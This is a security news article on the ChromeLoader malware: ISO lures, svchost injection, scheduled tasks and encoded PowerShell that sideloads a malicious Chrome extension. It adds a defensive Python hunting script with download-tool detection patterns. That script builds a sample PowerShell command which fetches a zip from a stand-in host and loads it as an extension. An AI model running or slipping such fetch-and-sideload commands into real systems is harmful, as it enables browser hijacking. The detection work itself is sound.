Windows malware injects malicious extensions into Chrome via PowerShell
According to The Register, a Windows malware strain called ChromeLoader has recently appeared on the Internet. It uses PowerShell to add a malicious extension to the victim's Chrome browser.
The extension forcibly redirects the victim's searches to advertising sites, generating revenue for its operators.
There is also a macOS variant that uses Bash to achieve the same goal, targeting Safari. Aedan Russell, an engineer at security firm Red Canary, detailed the malware in a blog post.
ChromeLoader is distributed as an ISO file disguised as a torrent or a cracked video game.
According to Red Canary, it spreads through websites and social media such as Twitter, via links or QR codes.
Once downloaded and opened, the ISO is mounted as a virtual drive on the victim's machine, which is how the malware gains initial access to the system.
The ISO contains an executable that installs ChromeLoader, plus what appears to be a .NET wrapper around the Windows Task Scheduler API.
This lets ChromeLoader stay hidden after the initial compromise and maintain persistence on the victim machine.
ChromeLoader persists through a scheduled task, but it does not create that task with the native command-line utility (schtasks.exe).
Instead, it performs cross-process injection into the service host (svchost.exe) and registers its scheduled task from there.
Once the injection is complete, the task runs under svchost.exe, which invokes the command interpreter (cmd.exe), which in turn runs a Base64-encoded PowerShell command that declares several variables.
That PowerShell code checks whether the ChromeLoader extension is already present on disk; if the path is not found, it uses wget (in PowerShell an alias for Invoke-WebRequest) to download the extension from a remote server and then loads it into Chrome.
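The chain above (svchost.exe running a scheduled task, cmd.exe, Base64-encoded PowerShell that downloads and sideloads an extension) is a good fit for process-creation telemetry. The following Python script is an added example written for this page, not code from the article, The Register or Red Canary. It decodes `-EncodedCommand` payloads (Base64 of UTF-16LE, which is the encoding powershell.exe expects), looks for download cmdlets and for Chrome's `--load-extension` switch, and tags the parent-child relationship the article describes. The process records, the script inside them, the extension directory and the download URL are all constructed for the example; it assumes the extension is sideloaded with `--load-extension`, the documented way to load an unpacked extension, which the article does not name explicitly.

```python
import base64
import re
from typing import Dict, List, Optional

# Patterns for the behaviours the article describes.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/]+=*)")
DOWNLOAD_RE = re.compile(
    r"(?i)\b(?:wget|curl|iwr|Invoke-WebRequest|Invoke-RestMethod|DownloadFile|DownloadString)\b"
)
LOAD_EXT_RE = re.compile(r"(?i)--load-extension")


def encode_ps(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: Base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries -e/-enc/-EncodedCommand, else None."""
    m = ENCODED_RE.search(cmdline)
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(proc: Dict[str, str]) -> List[str]:
    """Tag one process record with the ChromeLoader-style behaviours it exhibits."""
    tags: List[str] = []
    image = proc["image"].lower().rsplit("\\", 1)[-1]
    parent = proc.get("parent", "").lower().rsplit("\\", 1)[-1]
    cmd = proc["cmdline"]
    lowered = cmd.lower()
    runs_powershell = "powershell" in lowered or "pwsh" in lowered

    # Step 1: the task fires from the Task Scheduler service host, which spawns cmd.exe,
    # which runs PowerShell (svchost.exe -> cmd.exe -> powershell.exe).
    if image == "cmd.exe" and parent == "svchost.exe" and runs_powershell:
        tags.append("svchost-cmd-powershell")

    # Step 2: Base64-encoded PowerShell that downloads a file and loads it as an extension.
    if runs_powershell:
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            tags.append("encoded-powershell")
            if DOWNLOAD_RE.search(decoded):
                tags.append("ps-download")
            if LOAD_EXT_RE.search(decoded):
                tags.append("ps-load-extension")

    # Step 3: Chrome started with --load-extension, i.e. an unpacked extension sideloaded
    # without going through the Web Store.
    if image == "chrome.exe" and LOAD_EXT_RE.search(cmd):
        tags.append("chrome-load-extension")
    return tags


def hunt(processes: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Run analyze() over a process list and return {pid: tags} for every flagged process."""
    hits: Dict[str, List[str]] = {}
    for proc in processes:
        tags = analyze(proc)
        if tags:
            hits[proc["pid"]] = tags
    return hits


# Constructed sample: a hypothetical script shaped like the one the article describes.
# The extension directory, the download URL and the file names are made up for this example.
HYPOTHETICAL_SCRIPT = (
    '$ext = "$env:APPDATA\\ExampleExt"; '
    'if (-not (Test-Path $ext)) { wget "http://extension-host.example/ext.zip" -OutFile "$env:TEMP\\ext.zip" }; '
    'Start-Process chrome.exe -ArgumentList "--load-extension=$ext"'
)
ENCODED = encode_ps(HYPOTHETICAL_SCRIPT)

CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed process records in the shape of Sysmon Event ID 1 / Win32_Process data.
SAMPLE_PROCESSES = [
    {"pid": "900", "image": r"C:\Windows\System32\svchost.exe", "parent": r"C:\Windows\System32\services.exe",
     "cmdline": "svchost.exe -k netsvcs -p -s Schedule"},
    {"pid": "901", "image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": f"cmd.exe /c powershell.exe -enc {ENCODED}"},
    {"pid": "902", "image": PS, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": f"powershell.exe -enc {ENCODED}"},
    {"pid": "903", "image": CHROME, "parent": PS,
     "cmdline": f'"{CHROME}" --load-extension=C:\\Users\\alice\\AppData\\Roaming\\ExampleExt'},
    # Benign records that must not fire: a scripted backup and a normal Chrome launch.
    {"pid": "1200", "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"pid": "1201", "image": CHROME, "parent": r"C:\Windows\explorer.exe",
     "cmdline": f'"{CHROME}" --profile-directory=Default'},
]

if __name__ == "__main__":
    for pid, tags in hunt(SAMPLE_PROCESSES).items():
        print(pid, ", ".join(tags))
```

On a real host, feed `hunt()` records pulled from Sysmon Event ID 1 or `Win32_Process`. The tags are hunting leads rather than verdicts: extension developers legitimately launch Chrome with `--load-extension`, and administrators do run encoded PowerShell, so the combination of an encoded download-and-sideload script under a task-spawned cmd.exe is what makes the chain worth pulling.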
Once the malicious extension is loaded into Chrome, it can do its real job: tamper with the victim's search results and redirect them to malicious advertising sites.
ChromeLoader also resists removal: when the user opens the extension management page to delete it, the extension redirects the tab, forcing the user away from that page.
PowerShell is a common choice for malware like this because it is both a command shell and a script interpreter, and it is present on every modern Windows system.
Aedan Russell said: "This is a new way to load malicious extensions into Chrome, and other than ChromeLoader, no other known threat actors are trying to use this PowerShell technique to load malicious browser extensions."
“However, this technique is well-documented, and it’s often used by developers .”